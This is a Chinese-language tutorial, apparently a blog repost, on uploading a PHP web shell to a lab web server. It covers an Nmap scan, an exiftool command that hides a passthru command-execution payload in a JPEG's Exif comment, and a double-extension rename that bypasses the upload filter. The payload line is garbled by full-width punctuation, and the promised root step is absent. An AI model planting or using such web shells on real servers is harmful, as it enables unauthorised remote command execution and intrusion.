Shell如何上载到Web服务器并获得Root

这篇文章主要介绍Shell如何上载到Web服务器并获得Root，文中介绍的非常详细，具有一定的参考价值，感兴趣的小伙伴们一定要看完！

要求

本教程的这一部分将需要Nmap。

步骤1：扫描服务器

对于本教程，我在网络上设置了易受攻击的服务器。让我们来扫描一下。
 

Nmap找到了两个开放端口：80和22，因此我们知道服务器同时具有HTTP和SSH服务。让我们访问该网页…

第2步：上传尝试

让我们查看上传页面…

该表格告诉我们该文件必须是.jpeg，.jpg或.png文件。但是，以防万一，我们将尝试上传恶意的PHP文件。

真是的 它不会上传。但是，如果我们将恶意代码添加到图片文件的Exif数据中怎么办？

步骤3：将图片后门

为了上传我们的外壳，我们需要使用合法的图片文件。为了使我们的代码运行，我们需要将PHP代码添加到Exif数据中。输入此命令：

exiftool -Comment =“ <？php passthru（/ $ _ GET'cmd'）; _halt_compiler（）;” /root/picture.jpeg

在/ $ _ GET'cmd'）; 代码是读取我们的命令的内容，而_halt_compiler（）; 防止文件检查系统继续读取二进制数据。

现在，让我们运行命令的PHP代码被添加到注释中。将文件重命名为picture.php.jpeg，以便强制网站处理PHP代码。

步骤4：再试一次
 
 

现在，让我们上传后门文件。

是! 有效！现在，我们可以使用命令通过Web浏览器对其进行控制。

以上是“Shell如何上载到Web服务器并获得Root”这篇文章的所有内容，感谢各位的阅读！希望分享的内容对大家有帮助，更多相关知识，欢迎关注亿速云行业资讯频道！